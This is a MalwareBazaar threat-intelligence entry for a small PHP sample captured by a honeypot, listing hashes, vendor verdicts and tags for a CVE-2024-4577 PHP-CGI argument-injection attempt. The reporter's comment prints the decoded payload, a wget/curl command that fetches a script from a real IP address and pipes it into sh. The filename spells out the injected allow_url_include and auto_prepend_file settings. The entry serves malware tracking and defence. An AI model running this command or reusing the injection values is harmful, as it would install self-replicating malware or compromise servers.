MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 119e65a3d183698d071d5cfb38f991327f25bb489461dcc1e2cacc2ef402655c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 4


Intelligence 4 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 119e65a3d183698d071d5cfb38f991327f25bb489461dcc1e2cacc2ef402655c
SHA3-384 hash: 93f63aad6c9ede05f5c0b3ca231f6041d79bfe43a4392ae65d938a4e1ab02566c3f3da8a9d10b7fee7bdce8afd35cc86
SHA1 hash: 4148facf7372d5c24987c74e5b4e496452d47eb1
MD5 hash: 011dcdb98911e6403dd9bccd8ccdcb6f
humanhash: zulu-three-failed-angel
File name:66.94.124.248_1777414165197759_hello.world_ADd_allow_url_include_3d1_ADd_auto_prepend_file_3dphp_input.bin
Download: download sample
File size:241 bytes
First seen:2026-04-28 22:09:42 UTC
Last seen:2026-04-29 02:42:10 UTC
File type:php php
MIME type:text/x-php
ssdeep 6:iay2AOzckHHy7nhrdfJMJ1yG2M39+fLNmeH03n:iQFkZ6+MN+41
TLSH T1F2D0973BA2C612DA66FC0CE6408C6D9EA5B2681440800A4C337402A86128008382EDCC
Magika php
Reporter Blackdome
Tags:base64 base64-decode blackdome-archive blackdome.ai curl cve-2024-4577 Downloader dropper honeypot php pipe-to-sh selfrep shell-exec ssh wget


Avatar
Blackdome
BlackDome honeypot (blackdome-archive). PHP-CGI argument injection (CVE-2024-4577). Static analysis only. Decoded: (wget --no-check-certificate -qO- https://217.60.241.36/sh || curl -sk https://217.60.241.36/sh) | sh -s cve_2024_4577.selfrep IOCs: https://217.60.241.36/sh | 217.60.241.36 | campaign=selfrep. VT: 1/75. #ssh #blackdome-archive #php #cve-2024-4577 #shell-exec #base64-decode

Intelligence

File Origin
# of uploads :
2
# of downloads :
111
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
{HEX}php.generic.globals.495.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Labled as:
Trojan[Backdoor]/Script.WebShell
Link:
https://www.hybrid-analysis.com/sample/119e65a3d183698d071d5cfb38f991327f25bb489461dcc1e2cacc2ef402655c
Verdict:
Unknown
File Type:
unix shell
Link:
https://opentip.kaspersky.com/119e65a3d183698d071d5cfb38f991327f25bb489461dcc1e2cacc2ef402655c/results?tab=lookup
Score:
11%
Verdict:
Benign
File Type:
SCRIPT
Link:
https://malprob.io/report/119e65a3d183698d071d5cfb38f991327f25bb489461dcc1e2cacc2ef402655c
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/119e65a3d183698d071d5cfb38f991327f25bb489461dcc1e2cacc2ef402655c/
Threat name:
Text.Browser.Generic
Create hunting rule
Status:
Suspicious
First seen:
2026-04-28 22:10:16 UTC
File Type:
Text (PHP)
AV detection:
1 of 24 (4.17%)
Threat level:
  4/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=cgpgli6rqnuy2by5lt5tr6mrgj7slo2isrq5zqpczlgc55acmvoa._file
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/119e65a3d183698d071d5cfb38f991327f25bb489461dcc1e2cacc2ef402655c

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Comments